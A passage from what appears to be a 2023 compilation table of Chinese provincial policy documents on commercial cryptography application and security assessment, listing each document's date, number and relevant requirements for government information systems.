《自治区本级政务信息 化项目建设暂行管理办 法》(内发改高技字〔 2022〕1963 号) 第十二条第二点提出:备案文件应当包括项目名称、 ……、 密码应用方案和密码应用安全性评估报告等内容。 第三十四条提出:各项目单位和建设(代建)单位应当严 格遵守有关保密等法律法规规定,构建全方位、多层次、 一致性的防护体系,按要求采用密码技术,并定期开展密 码应用安全性评估和等保测评,确保政务信息系统运行安 全和政务信息资源共享交换的数据安全。 2022 年 11 月 《内蒙古自治区数字经 济促进条例(草案)》 第七章“安全保障”第六十五条中提出:网络运营者应当 依法进行安全评估,采取软件测评、风险评估、安全漏洞 分析和预警监测、网络安全等级保护、商用密码应用安全 性评估、数据安全测评等安全技术措施, 保障数据、网络、 设施等方面的安全。 2022 年 1 月 《关于规范全区商用密 码应用安全性评估结果 备案工作的通知》(内 国密局发〔2022〕1 号) 本地区、本部门(行业)的网络与信息系统运营者为备案 主体。网络与信息系统运营者应按照法律、法规、规章和 国家、自治区有关规定,同步规划、同步建设、同步运行 商用密码保障系统,规范开展密评工作,履行备案程序。 2021 年 11 月 《关于做好自治区本级 政务信息化项目商用密 码应用安全性评估工作 的通知》(内国密局发 〔2021〕7 号) 一、本级新建政务信息化项目要认真落实国家密码管理应 用有关法律法规和标准规范要求,同步规划、同步建设、 同步运行密码保障系统并定期进行评估。 二、本级新建政务信息化项目在编制项目建议书、可行性 研究报告和初步设计时,要单设章节专题阐述密码建设内 容并编制密码应用方案。项目报竣申请验收时,要提供密 码测评报告,报告结论未通过的,不得提请验收。 2021 年 9 月 《内蒙古自治区商用密 码事中事后监管方案》 (内国密局发〔2021〕 5 号) 1. 监管事项( 1 )非涉密关键信息基础设施、网络安全等级 保护第三级及以上信息系统、国家政务信息系统等重要网 络和信息系统中商用密码应用的合规性、正确性、有效性; 4. 监管方式和检查频次、监管方式:现场检查和委托第三 方检测机构检测相结合。检查频次:从非涉密关键信息基 础设施、网络安全等级保护第三级及以上信息系统、国家 政务信息系统等重要网络和信息系统中随机抽取,随机检 查比例为每年 10%-20% 。3 年内已被随机检查、无违规行 为的,不列入随机检查范围。对随机检查不合格的部门单 位加大检查频次。 辽宁省 2021 年 6 月 《辽宁省省级政务信息 化建设项目预算申报 指南》(辽财办函〔 2021〕382 号) 第三章“申报内容”第七节“工程建设其他经费”中提出: 工程建设其他经费是项目单位根据相关文件规定和要求, 结合项目类型和规模等因素,聘请相应的第三方服务机构 提供相应服务所产生的费用, 包括项目咨询(设计)服务费、 工程监理费、网络安全等级保护测评费、第三方测试费、 密码应用安全性评估费等内容。 中国密码学会密评联委会 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 辽宁省 2020 年 10 月 《关于进一步加强政 务信息化系统密码应 用与安全性评估工作 的通知》(辽密局发〔 2020〕26 号) 该文件对辽宁省内非涉密政务信息系统立项、建设、验收 等过程中使用密码和开展密评工作提出要求。 吉林省 2022 年 5 月 《吉林省促进商用密码 产业高质量发展行动 计划》(吉密局发〔 2022〕1 号) 该计划提出:依法督促我省重要网络和信息系统运营者同 步规划、同步建设、同步运行密码保障系统,定期开展商 用密码应用安全性评估;加强关键信息基础设施安全保护 制度、网络安全等级保护制度与商用密码应用安全性评估 要求的衔接;规范数据分类分级保护、互联网平台和个人 信息处理者的密码使用管理。 2021 年 12 月 《关于落实商用密码应 用安全性评估结果备案 工作的通知》(吉密协 办〔2021〕21 号) 各地区、省直各部门网络与信息系统运营者按照法律、法规、 规章和国家有关规定,同步规划、同步建设、同步运行商 用密码保障系统,规范开展密评工作。 严格履行备案程序,各地区、省直各部门网络与信息系统 运营者自密评报告出具之日起 30 日内,填写《网络与信息 系统密评备案信息表》,连同密评报告报省密码管理局备案。 各地区密码管理部门负责指导、汇总报送本地区网络与信 息系统备案工作。 2021 年 6 月 《吉林省数字政府建设 “十四五”规划》(吉 政数综合〔2021〕8 号) 第十一章“建设安全可靠的管理运维体系”第一节“建立 安全管理和运维工作机制”中提出:严格落实网络安全法 律法规和政策标准要求,推动安全可靠技术和产品在重要 领域的应用,推动政务云平台获得安全认证,政务信息系 统落实信息系统安全等级保护、风险评估、商密评估等有 关要求。推动自主可控信息化产品和国产密码在相关领域 的应用,提升密码基础支撑能力,确保数字政府建设自主 可控、安全高效运行。 2020 年 10 月 《关于进一步做好政务 信息系统密码应用与安 全性评估工作的通知》 (吉密协办〔2020〕16 号) 政务信息系统规划、建设、运行阶段,项目建设单位要严 格落实国家密码管理有关规定和规范要求,同步规划、同 步建设、同步运行密码保障系统,并定期进行评估。 委托开展商用密码应用安全性评估的,应从《商用密码应 用安全性评估试点机构目录》中选择评估机构。 商用密码应用安全性评估工作相关材料需报省密码管理局 备案。 2020 年 9 月 吉林省政务信息化项目 建设管理办法(吉政数 联〔2020〕9 号) 第一章“总则”第五条中提出:省密码管理局负责政务信 息系统密码应用的指导、监督和检查工作。指导项目建设 单位按要求采用密码技术、密码产品、密码服务,并定期 开展密码应用安全性评估,确保政务信息系统运行安全和 政务信息资源共享交换的数据安全。 商用密码应 2023 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 黑龙江省 2022 年 3 月 《关于规范商用密码应 用安全性评估结果备案 工作的通知》 旨在规范和强化黑龙江省密评备案程序,要求网络与信息 系统运营者,应同步规划、同步建设、同步运行商用密码 保障系统, 自行或者委托商用密码检测机构开展密评工作, 履行备案程序。自密评报告出具之日起 30 日内,填写《网 络与信息系统密评备案信息表》,连同密评报告报同级密 码管理部门备案。 2021 年 12 月 《黑龙江省“十四五” 数字政府建设规划》(黑 政发〔2021〕17 号) 第四章“夯实四大数字基础支撑底座”第四节“构建全省 一体化安全防护体系”第一条“提升安全保障能力”中提出: 完善密码基础设施建设,建立信任服务体系,为资源安全 利用和行为可信提供支撑。强化安全防护技术支撑能力。 加强数字政府密码应用服务能力,同步规划、同步建设、 同步运行密码保障系统,推进政务信息化系统密码改造工 作,并定期进行评估。 2021 年 4 月 《黑龙江省省级政务云 管理暂行办法》(黑政 办发〔2021〕17 号) 第一章“总则”第六条中提出:省政务云按照国家密码管 理有关法律法规和标准规范要求,同步规划、同步建设、 同步运行密码保障系统。 2020 年 11 月 《关于进一步加强政务 信息系统密码应用与安 全性评估工作的通知》 旨在推动和加强黑龙江省政务信息系统密码应用与安全性 评估工作,要求我省非涉密政务信息系统项目建设单位同 步规划、同步建设、同步运行密码保障系统并定期进行密 码应用安全性评估,保障密码应用与安全性评估经费,配 备密码保障系统管理和运维人员。 上海市 2022 年 8 月 《上海市市级数字化项 目支出预算管理暂行 办法》(沪经信推〔 2022〕535 号) 明确将密码产品、密码服务列入建设类、运维类项目的支 出范围。申报数字化项目应当严格落实密码应用要求。将 密码应用情况作为建设类项目评审重点之一。项目实施时 需落实密码应用要求。项目验收时需提交密码应用测评报 告。 2022 年 5 月 《上海市重要网络和信 息系统密码应用与安全 性评估工作指南(2022 版)》 第二章“密码应用与安全性评估范围”中提出:对于涉及 国家安全和社会公共利益的重要网络和信息系统,包括非 涉密的关键信息基础设施、网络安全等级保护第三级以上 网络(含信息系统)、政务信息系统,以及法律、行政法 规和国家有关规定要求使用商用密码进行保护的其他网络 和信息系统,应当落实密码有关法律法规、管理办法和标 准规范的要求,同步规划、同步建设、同步运行密码保障 系统并定期进行评估。 2022 年 4 月 《上海市政务云管理暂 行办法》(沪府办规〔 2022〕6 号) 政务云服务商负责建立健全安全保护工作制度,提供安全 可信的产品和服务,做好政务云的安全监测和防御工作, 定期开展网络安全等级保护测评与密码应用安全性评估, 保障政务云安全稳定运行。 政务云主管部门、政务云运行管理单位和使用单位应当严 格落实国家网络安全和商用密码应用要求, 采取安全措施, 并与政务云同步规划、同步建设、同步运行网络安全体系 与密码保障体系。 中国密码学会密评联委会 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 上海市 2022 年 4 月 《上海市电子政务云政 务移动办公信息系统密 码应用建设指南(暂 行)》 可用于指导政务移动办公信息系统的责任单位规范开展密 码应用与安全性评估工作,也可供系统集成单位、密码应 用支撑单位和商用密码检测机构参考。各级地方政务移动 办公信息化建设、使用、管理单位也可参照《指南》开展 相关工作。 2022 年 2 月 《关于进一步加强我市 电子政务云及上云信息 系统密码应用工作的通 知》 加强上海市电子政务云及上云信息系统密码应用与安全性 评估工作。 2021 年 5 月 《关于规范和加强我市 重要网络和信息系统密 码应用与安全性评估工 作的通知(含上海市重 要网络和信息系统密码 应用与安全性评估工作 指南(2021 版))》 明确密码应用与安全性评估的范围、要求、工作实施流程 和保障措施,规范和加强上海市重要网络和信息系统密码 应用与安全性评估工作。 2020 年 3 月 《关于进一步加强和规 范关键信息基础设施密 码应用工作的通知》 规范和加强上海市关键信息基础设施密码应用与安全性评 估工作。 江苏省 2022 年 4 月 《省政府关于加快统筹 推进数字政府高质量建 设的实施意见》(苏政 发〔2022〕44 号) 第五章“织密筑牢网络数据安全防火墙”第十六条“严格 执行安全管理制度”中提出:依法加强数据安全防护,落 实网络安全等级保护、关键信息基础设施安全保护、数据 分类分级保护、密码应用管理等制度。 2022 年 3 月 《关于规范密码应用安 全性评估结果备案工作 的通知》(苏密局字〔 2022〕7 号) 进一步规范省各有关部门、单位的密评与备案工作,明确 密评和备案工作情况将作为网络安全工作责任制落实情况 有关密码管理考核依据。 2021 年 4 月 《江苏省省级政务信息 化项目建设管理办法》 (苏政办发〔2021〕24 号) 第三章“建设和资金管理”第十八条中提出:项目建设单 位应当落实国家和省密码管理有关法律法规和标准规范的 要求,同步规划、同步建设、同步运行密码保障系统并定 期进行评估。 2020 年 8 月 《江苏省政务信息化项 目密码应用与评估备案 指南(试行)》(苏密 局字〔2020〕43 号) 该文件提出政务信息化项目密码应用与评估备案工作的要 求和具体流程。 商用密码应 2023 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 浙江省 2022 年 9 月 《关于对密评结果开展 审查工作的通知》 对自 2022 年 1 月起至 2022 年 12 月底之前全省开展的密评 项目, 重点对各地各单位新建等保三级以上政务信息系统, 《浙江省密码应用与创新发展实施方案》涉及的重要网络 与信息系统的密评结果,逐项核查密评活动是否客观、密 评实施是否规范有效、密评记录是否清晰准确等。 2022 年 8 月 《电子政务建设项目申 报工作的通知》 建设项目应按照国家有关规定和标准明确网络安全保护等 级或密级,设计和采取网络安全保护措施。非涉密项目方 案应包括符合国家标准设计的密码应用设计方案,重要网 络与信息系统项目应按要求规划商用密码应用安全性评估。 新建项目网络安全预算不低于项目总投资 5%。 2022 年 7 月 《浙江省人民政府关于 深化数字政府建设的实 施意见》(浙政发〔 2022〕20 号) 第五章“构建数字政府全方位安全保障体系”第二条“落 实安全制度要求”中提出:严格落实相关法律法规制度, 全面贯彻《浙江省公共数据条例》, 健全数据归集、治理、 共享、开放、授权运营、安全管理等制度。建立网络安全 等级保护、涉密信息系统分级保护、密码应用安全性评估 制度,完善网络安全标准规范。探索建立首席网络安全官 制度。 2022 年 3 月 《关于深入开展密码应 用安全性评估工作的通 知》 2022 年,各地各单位新建等保三级及以上政务信息系统, 必须落实商用密码应用安全性评估要求:同步规划、同步 建设、同步运行商用密码保障系统,选择经国家密码管理 局认可、具备相关资质的检测机构开展密码应用安全性评 估工作,并基本符合密码应用要求。 2022 年 1 月 《浙江省电子政务外网 安全评估指标体系(试 行)》 安全防护层面中要求:统一建设密码服务平台,为本地区 提供密码服务;对本地区网络安全等保三级及以上政务信 息系统开展商用密码应用安全性评估。 2021 年 12 月 《关于规范商用密码应 用安全性评估结果备案 工作的通知》(浙密局 发〔2021〕29 号) 请各地市各部门指导督促本地区、本部门(行业)有关网 络与信息系统运营者自密评报告出具之日起 30 日内,填写 备案信息表并在规定期限内将表格与密评报告报省密码局 备案;请各市密码管理部门定期收集汇总所在地区的密评 结果备案信息,填写《密评备案信息汇总表》按季度报送 省密码管理局。 2021 年 10 月 《关于加强浙江辖区证 券期货业密码应用工作 的通知》(浙证监机构 字〔2021〕120 号) 辖区各经营机构应当于 2021 年底前, 完成方案制定和评审。 2022 年 12 月前,完成系统改造、安全性评估及收尾工作; 辖区国有控股证券公司、期货公司、基金管理公司、独立 基金销售机构应严格按要求开展密码应用工作,鼓励民营 和外资机构资源开展相关工作;辖区各经营机构应当积极 参与证券业协会、期货业协会、基金业结汇组织开展的密 码应用专项培训。 中国密码学会密评联委会 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 安徽省 2023 年 1 月 《数字安徽建设 2023 年重点工作安排》 加强对基础网络、数据中心、工业互联网平台等关键信息 基础设施的安全防护,定期开展网络安全等级保护和商用 密码应用安全性评估。 2022 年 10 月 《安徽省政务信息化项 目建设管理办法》(皖 数安〔2022〕2 号) 第四章“项目建设管理”第三十条中提出:项目建设单位 应当按照国家密码管理有关法律法规和标准规范要求,同 步规划、同步建设、同步运行密码保障系统并定期进行密 码应用安全性评估。 2022 年度 《综合绩效考核依据》 根据《安徽省金融和重要领域密码应用于创新发展实施方 案(2019-2022 年)的通知》, 本部门新建、改建、扩建(含 规划和建设中)的非涉密信息系统无密码应用且未作出相 应规划安排的扣 0.5 分。 2021 年 12 月 《关于规范商用密码应 用安全性评估结果备案 工作的通知》 项目建设单位应落实国家密码管理有关法律法规和标准规 范的要求, 使用商用密码进行保护, 同步规划、同步建设、 同步运行密码保障系统并定期开展密码应用安全性评估。 福建省 2022 年 12 月 《福建省数字政府改革 和建设总体方案》(闽 政〔2022〕32 号) 全面推进重要领域商用密码应用,落实国家密码管理有关 法律法规和标准规范的要求,同步规划、同步建设、同步 运行商用密码保障系统并定期进行商用密码应用安全性评 估。 2022 年 3 月 《关于加强商用密码应 用与安全性评估工作的 通知》(闽密〔2022〕1 号) 网络与信息系统建设单位应当同步规划、同步建设、同步 运行商用密码保障系统并定期进行商用密码应用安全性评 估。 2021 年 11 月 《福建省“十四五”数 字福建专项规划》(闽 政〔2021〕25 号) 第八章“筑牢可信可靠的网络安全屏障”第二节“完善网 络安全监管体系”中提出:全面落实网络安全等级保护国 家标准, 坚持“自主可控”原则, 完善密码基础设施建设, 健全密码应用安全评估机制。 2017 年 11 月 《关于在数字福建建设 项目可研暨初设编写提 纲增加重要领域密码应 用章节的通知》(闽数 字办〔2017〕14 号) 增加重要领域密码应用独立章节,要求安全系统设计根据 系统安全等级保护级别, 按照《信息系统密码应用基本要求》 进行设计。 江西省 2021 年 8 月 《江西省电子印章管理 暂行办法》(赣府厅字 〔2021〕61 号) 第六章“安全管理”第二十七条中提出:具备完善的信息 安全防护措施,通过商用密码应用安全性评估,至少符合 信息系统安全保护等级三级要求。 2020 年 9 月 《江西省政务信息化项 目建设管理办法》(赣 府厅字〔2020〕68 号) 第三章“建设和资金管理”第十五条中提出:项目建设单 位应当按照《中华人民共和国网络安全法》《中华人民共 和国密码法》等法律法规以及党政机关安全管理等有关规 定,建立网络安全和密码安全等管理制度,同步规划、同 步建设、同步运行密码保障系统,定期开展网络安全检测 与风险评估,保障信息系统安全稳定运行。 商用密码应 2023 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 山东省 2022 年 1 月 《关于规范商用密码应 用安全性评估结果备案 工作的通知》(鲁密局 字〔2022〕1 号) 该文件对各市和省有关部门、单位开展密评结果备案工作 作了具体要求。 2021 年 7 月 《山东省“十四五”数 字强省建设规划》(鲁 政字〔2021〕128 号) 推动密码创新和融合应用,落实密码应用与安全性评估要 求,塑造政务系统密码服务保障体系。 2021 年 1 月 《关于促进山东省网络 安全产业发展的指导 意见》(鲁网办发〔 2021〕1 号) 第二章“主要任务”第二条“服务模式升级”中提出:推 动网络安全企业由提供安全产品向提供安全服务和解决方 案转变,支持专业机构和企业开展网络安全规划咨询、安 全集成、风险评估、检测认证、密码服务和检测、威胁监测、 应急响应、安全运维、安全培训等安全服务。 2020 年 4 月 《山东省政务云平台管 理暂行办法》(鲁数字 〔2020〕7 号) 政务云节点服务商应严格落实网络安全、保密、密码等相 关法律法规,建立安全管理体系,定期开展网络安全等级 保护测评、 ……、商用密码应用安全性评估等工作。 河南省 2023 年 1 月 《河南省非涉密政务信 息系统安全建设指南 (试行)》(豫数政办 〔2023〕1 号) 要求建设单位应根据政务信息系统安全保护等级,明确密 码应用等级及需求,并编制密码应用方案;政务信息系统 应于上线前和运维期间每年开展安全风险评估,安全保护 等级第三级及以上系统还应同时开展密码应用安全性评估 工作,并根据密评报告进行整改。 要求运维单位应根据密码管理部门的安全通报,对政务信 息系统进行风险排查和安全加固。 要求建设单位应依法通过政府采购方式确定承担密码应用 安全性评估的单位, 并直接签订合同, 严禁层层转包分包。 2023 年 1 月 《河南省促进商用密码 产业高质量发展若干政 策措施》(豫发改数字 〔2023〕13 号) 支持商用密码在全省非涉密政务信息系统、关键信息基础 设施、网络安全等级保护第三级以上网络建设中的应用, 依法督促重要网络和信息系统建设单位同步规划、同步建 设、同步运行密码保障系统并定期开展商用密码应用安全 性评估,落实评估结果备案制度。强化重要网络与信息系 统商用密码应用与安全性评估情况的执法检查。加强电子 政务电子认证密码基础设施建设, 积极稳妥推动电子印章、 电子证照等领域密码应用。支持重点企业开展政务、金融、 交通、能源、医疗等领域密码应用示范,遴选推广典型场 景优秀密码应用方案, 推荐申报国家级商用密码试点示范。 2022 年 11 月 《河南省网络安全条 例》(2022 年 11 月 26 日河南省第十三届人民 代表大会常务委员会第 三十六次会议通过) 第十九条提出:县级以上网信、公安等有关部门应当指导 督促网络运营者落实关键信息基础设施安全保护、网络安 全等级保护、数据安全保护、个人信息保护、密码应用安 全性评估、云计算服务安全评估、网络信息安全投诉举报 等制度,落实相关国家标准的强制性要求,制定网络安全 事件应急预案。 中国密码学会密评联委会 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 河南省 2022 年 10 月 《河南省加快推进电子 证照等“四电”扩大应 用和互通互认实施方 案》(豫政办〔2022〕 101 号) 提高“四电”支撑系统、应用系统安全保障能力,严格落 实网络安全等级保护、商用密码应用安全性评估等要求, 增强系统入侵防御、数据库审计等功能。 2022 年 9 月 《河南省大数据产业 发展行动计划(2022- 2025 年)》(豫政办〔 2022〕90 号) 第三章“主要任务”第七节“构建安全保障体系”中提出: 实施数据安全“铸盾”行动,定期开展关键设施和系统安 全检查、风险评估,建设网络安全应急体系。依法使用密 码保护数据安全,定期开展密码应用安全性评估,落实网 络安全等级保护和保密等要求。 2022 年 4 月 《河南省政务数据安全 管理暂行办法》(豫政 办〔2022〕39 号) 第七条提出:网信部门负责统筹协调、检查指导和相关监 督管理等工作。公安部门负责等级保护、日常巡查、执法 检查、信息通报、应急处置等监督管理工作。保密、国家安全、 密码管理、大数据管理、通信管理等部门按照本办法和有 关法律、法规、规章的规定,在各自职责范围内承担政务 数据安全监管职责。 第十一条提出:政务部门应落实等级保护、密码应用等要求, 定期开展政务信息系统等级保护和商用密码应用等安全性 评估。 2022 年 1 月 《河南省“十四五”新 型基础设施建设规划》 (豫发改数字〔2022〕 52 号) “推动新型基础设施全部纳入关键信息基础设施保护范围, 确保网络安全防护设施与新型基础设施同步规划、同步建 设、同步使用。”“健全网络安全监测预警响应机制,构 建以密码技术为核心、多种技术相互融合的网络安全保障 体系,加强重要新型基础设施可靠性保障。”“推广安全 可信、自主可控的网络产品和服务,强化密码技术在重要 新型基础设施中的应用。”“严格落实网络安全工作责任制, 严格执行网络安全等级保护、密码应用安全性评估等相关 政策法规和标准规范要求” 2021 年 12 月 《关于做好商用密码应 用安全性评估结果备案 工作的通知》(豫密局 电〔2021〕55 号) 根据《关于规范商用密码应用安全性评估结果备案工作的 通知》(国密局字〔2021〕392 号),对河南省区域内密评 及备案工作进行部署安排,提出有关备案要求。 2021 年 10 月 《关于开展我省重要领 域网络和信息系统密码 应用安全性评估工作的 通知》(豫密局电〔 2021〕40 号) 2021 年 10 月,河南省密码管理局例行开展年度密评检查, 要求各单位对已建重要领域网络和信息系统开展密码应用 安全性自查,并抽取部分系统进行密评。 2020 年 11 月 《关于进一步加强政务 信息系统密码应用与安 全性评估工作的通知》 (豫密局字〔2020〕35 号) 根据国家密码管理局《关于请进一步加强国家政务信息系 统密码应用与安全性评估工作的函》(国密局函〔2020〕 119 号),河南省密码管理局、发展改革委、财政厅、大数 据管理局联合印发文件,就河南省非涉密政务信息系统密 码应用与安全性评估工作提出“三同步一评估”、保障密 码应用与安全性评估经费、配备密码保障系统管理和运维 人员等要求。 商用密码应 2023 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 湖北省 2022 年 12 月 《湖北省商用密码应用 安全性评估工作指南 (2022 版)》 为更好指导非涉密关键信息基础设施、网络安全等级保护 第三级以上网络、国家政务信息系统等网络与信息系统密 码应用与安全性评估工作, 汇编有关法律法规与政策文件、 密码应用标准规范、应用方案示例、常见问题解答, 形成《湖 北省商用密码应用与安全性评估工作指南(2022 版)》 2022 年 8 月 《关于印发深化数据赋 能扩大“免证明”应用 领域工作方案的通知》 (政办发〔2022〕42 号) 加强电子证照应用安全监管。落实国家相关法律法规要求, 完善电子证照管理规章制度,加强电子证照制发、归集、 存储和使用环节的信息安全管理, 防范未经授权擅自调用、 留存电子证照等风险。对涉及个人隐私的证照数据,严格 落实持证主体认证授权机制, 充分保障持证主体的知情权、 决定权。各地要加强数据安全管理自查和监管,强化电子 证照数据和应用接口的安全防护,严格遵守网络安全等级 保护制度规定,强化国产密码应用和安全性评估,主动感 知发现和及时处置异常调用、非法访问等情况。 2021 年 12 月 《关于规范全省商用密 码应用安全性评估结果 备案工作的通知》(鄂 密局发〔2021〕3 号) 各地区、各部门(行业)有关网络与信息系统运营者应按 照法律、法规、规章和国家有关规定, 同步规划、同步建设、 同步运行密码保障系统, 规范开展密评工作, 履行备案程序。 2021 年 8 月 《进一步加强政务信息 系统密码应用与安全性 评估工作的通知》(鄂 密局发〔2021〕2 号) 新建、扩建、改建以及通过政府购买服务产生的政务信息 系统,项目建设单位应当同步规划、同步建设、同步运行 密码保障系统并定期评估, 采用符合国家标准的密码算法、 技术,使用具有《商用密码产品认证证书》的密码产品和 国家主管部门许可的密码服务。密码应用方案及密码应用 方案评估报告是项目立项环节的必备材料, 结论为“符合” 或“基本符合”的密码应用安全性评估报告是项目验收环 节的必备材料。未进行密码应用安全性评估或评估不合格 的政务信息系统,不得继续投入运行。 2020 年 7 月 《关于印发湖北省数 字政府建设总体规划 (2020-2022 年)的通知》 (鄂政发〔2020〕12 号) 加快安全管理系统建设,建设省市县三级全域安全态势与 预警处理、云安全能力平台、安全数据分析平台、终端安 全管理系统、攻防演练平台、密码支撑体系等。强化自主 可控技术支撑,根据国家法律、政策法规、文件要求采用 国产密码及自主可控的技术和产品,建设数字政府国产密 码基础支撑体系,开展国产密码应用安全性评估工作、建 立健全密码应用及自主可控安全性评估审查制度,助推云 操作系统、数据库、中间件、大数据等方面国产化替代进程, 推动安全可靠技术和产品在重要领域的应用。 2018 年 9 月 《湖北省政务信息化项 目建设管理办法》(鄂 政办发〔2018〕59 号) 第三章“安全管理”第十三条中提出:项目建设单位应开 展网络与信息安全风险评估,严格落实等级保护、分级保 护和国家密码管理的要求,同步规划、同步建设、同步运 行密码保障系统并定期评估,切实保障政务信息化项目安 全稳定运行。 中国密码学会密评联委会 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 湖北省 2015 年 12 月 《关于促进电子政务协 调发展的实施意见》(鄂 政办发〔2015〕95 号) 完善安全防护体系,按照密码应用规范的要求,构建全省 电子政务安全防护体系。制定统一安全策略, 划分安全域, 保障基础信息网络、重要信息资源库、重点业务系统和安 全基础设施的安全。推动信任服务体系建设,建立符合国 家相关标准规范的统一认证、授权管理、可信时间等安全 基础设施。加大自主可控信息安全产品运用。强化安全保 密意识, 加强日常安全管理, 落实密码管理相关主体责任。 湖南省 2022 年 3 月 《政务信息化项目网络 安全审查规范》(DB43/ T 2313-2022) 第五章“审查前合规性自查”第一节“方案编制”中提出: 建设单位应对项目安全需求进行分析,并根据安全需求组 织编制项目安全设计方案。安全设计方案应包含网络安全 体系总体设计方案、密码应用方案、数据安全保护方案。 2020 年 8 月 《湖南省省直单位政务 信息系统项目建设管理 办法》(湘政办发〔 2020〕34 号) 第三章“建设和资金管理”第十六条中提出:项目建设单 位应当落实国家密码管理有关法律法规和标准规范要求, 同步规划、同步建设、同步运行密码保障系统并定期进行 评估。未进行密码应用安全评估或评估不合格的项目,不 得通过项目验收,不得投入运行。 广东省 2023 年 2 月 《关于印发〈广东省促 进商用密码产业高质量 发展的行动计划〉的通 知》(粤密码局发〔 2023〕2 号) 广东省密码管理局等 16 个部门联合印发该行动计划,进一 步强调“重要网络和信息系统运营者同步规划、同步建设、 同步运行密码保障系统,定期开展商用密码应用安全性评 估并及时对结果进行备案”等要求。 2022 年 12 月 《关于进一步规范商用 密码应用安全性评估试 点工作的通知》(粤密 码局发〔2022〕13 号) 按照国家密码管理局有关文件要求,为进一步规范商用密 码应用安全性评估各相关主体责任、密评工作流程以及监 管工作要求等,广东省密码管理局印发该通知。 2021 年 12 月 《关于规范商用密码应 用安全性评估结果备案 工作的通知》(粤密码 协调组〔2021〕7 号) 按照国家密码管理局有关文件要求,为规范商用密码应用 安全性评估备案工作,广东省密码应用推进工作协调小组 办公室印发该通知。 2021 年 3 月 《广东省发展改革委 广 东省政务服务数据管理 局关于印发〈广东省涉 及固定资产投资的省级 政务信息化项目审批细 则〉的通知》(粤发改 高技函〔2021〕566 号) 在粤府办〔2020〕9 号文件基础上,进一步明确涉及固定资 产投资的省级政务信息化项目的密码应用及商用密码应用 安全性评估要求。 2020 年 6 月 《广东省政务服务数据 管理局关于印发〈广东 省省级政务信息化服务 项目立项审批细则〉 的通知》(粤政数〔 2020〕12 号) 在粤府办〔2020〕9 号文件基础上,进一步明确项目立项前 对密码应用方案进行商用密码应用安全性评估等要求和流 程。 商用密码应 2023 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 广东省 2020 年 6 月 《广东省政务服务数据 管理局关于印发〈广东 省省级政务信息化服务 项目验收前符合性审查 细则〉的通知》(粤政 数〔2020〕13 号) 在粤府办〔2020〕9 号文件基础上,进一步明确项目验收前 对系统进行商用密码应用安全性评估等要求和流程。 2020 年 6 月 《广东省省级政务信息 化项目商用密码应用工 作指引》(粤密码协调 组〔2020〕2 号) 在粤府办〔2020〕9 号、粤政数〔2020〕12 号、粤政数〔 2020〕13 号文件基础上,广东省密码应用推进工作协调小 组办公室印发该指引,进一步明确项目规划、建设、运行 等各阶段密码应用和商用密码应用安全性评估工作要求、 流程;并根据最新政策和标准要求不断优化完善,分别于 2021 年 9 月修订(粤密码协调组〔2021〕4 号)、2021 年 12 月印发补充通知(粤密码协调组〔2021〕5 号)、 2022 年 9 月修订(粤密码协调组〔2022〕6 号)。 2020 年 4 月 《广东省人民政府办公 厅关于印发广东省省级 政务信息化项目管理办 法的通知》(粤府办〔 2020〕9 号) “涉及密码应用的项目应当落实国家密码管理有关法律法 规和标准规范的要求,同步规划、同步建设、同步运行密 码保障系统并定期进行评估”。“不符合密码应用和网络 安全要求的项目不予立项”。 广西壮族自 治区 2022 年 9 月 《关于加快数字化转型 发展深入推进数字广西 建设的实施意见》(桂 发〔2022〕18 号) 第一章“总体要求”第二条中提出:确保发展安全可控。 统筹发展和安全,坚持促进发展与监管规范并重,建立健 全安全管理体系、技术防护体系和协同监管体系,强化网 络安全、关键信息基础设施安全、数据资源安全,全方位 提升安全防护能力。 重点任务清单第四条“构筑数字广西‘新基座’”中提出: 健全网络安全等级保护、信息系统分级保护、密码应用安 全性评估、风险评估、预警和应急处置制度,推动行业组 织建立健全本行业的网络安全保护规范和协作机制。 2021 年 12 月 《广西政务信息化建设 发展“十四五”规划》(公 开版)(桂发改高技〔 2021〕1196 号) 创新密码技术和应用,强化密码安全管理和综合服务,加 强密码应用测评能力建设,推进密码在政务信息化建设中 全面有效应用。 2021 年 3 月 《广西壮族自治区政务 信息化项目建设管理办 法(试行)》(桂政办 发〔2021〕21 号) 第四章“建设和资金管理”第十九条中提出:项目建设单 位应当落实国家密码管理有关法律法规和标准规范的要求, 同步规划、同步建设、同步运行密码保障系统并定期进行 评估。 海南省 2022 年 11 月 《省本级政务信息化项 目验收管理规范(暂 行)》(琼数组办〔 2022〕10 号) 省政务信息化项目主管部门会同省委网信办、省发展改革 委、省密码局等相关部门组织竣工验收。明确将商用密码 应用安全性评估作为项目竣工验收的前置必备条件,密评 报告作为项目验收必备材料,省密码局专家代表在项目竣 工验收评审会上具有一票否决权。 中国密码学会密评联委会 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 海南省 2022 年 9 月 《海南省电子政务云密 码服务管理办法(试 行)》(琼数建〔 2022〕46 号) 进一步规范全省电子政务云上信息系统商用密码应用和管 理,依托省电子政务云密码服务平台为全省各级政务部门 提供集约高效的密码服务。 2022 年 7 月 《海南省政务信息化项 目建设管理实施细则 (暂行)》(琼数组办 〔2022〕5 号) 新建项目的网络安全设计应包括安全管理制度建设、入网 安全评估、等级保护测评、渗透测试、安全加固等安全内容。 运维类项目应按需规划网络安全等级保护测评、商用密码 应用安全性评估、信息系统风险评估、应急演练、重要活 动保障等网络安全保障服务内容,保障信息系统安全稳定 运行。 2022 年 7 月 《海南省促进商用密码 应用和产业发展若干政 策措施》(琼国密局字 〔2022〕12 号) 着眼自贸港建设风险防控需要,围绕自贸港封关运作准备 工作大局,从统筹规范政务领域密码应用、推进重要领域 和关键信息系统密码应用、鼓励科研创新和加强人才培养、 支持培育企业和促进产业发展等几个方面共提出了 15 条针 对性的政策措施。 2022 年 6 月 《海南省政务信息化项 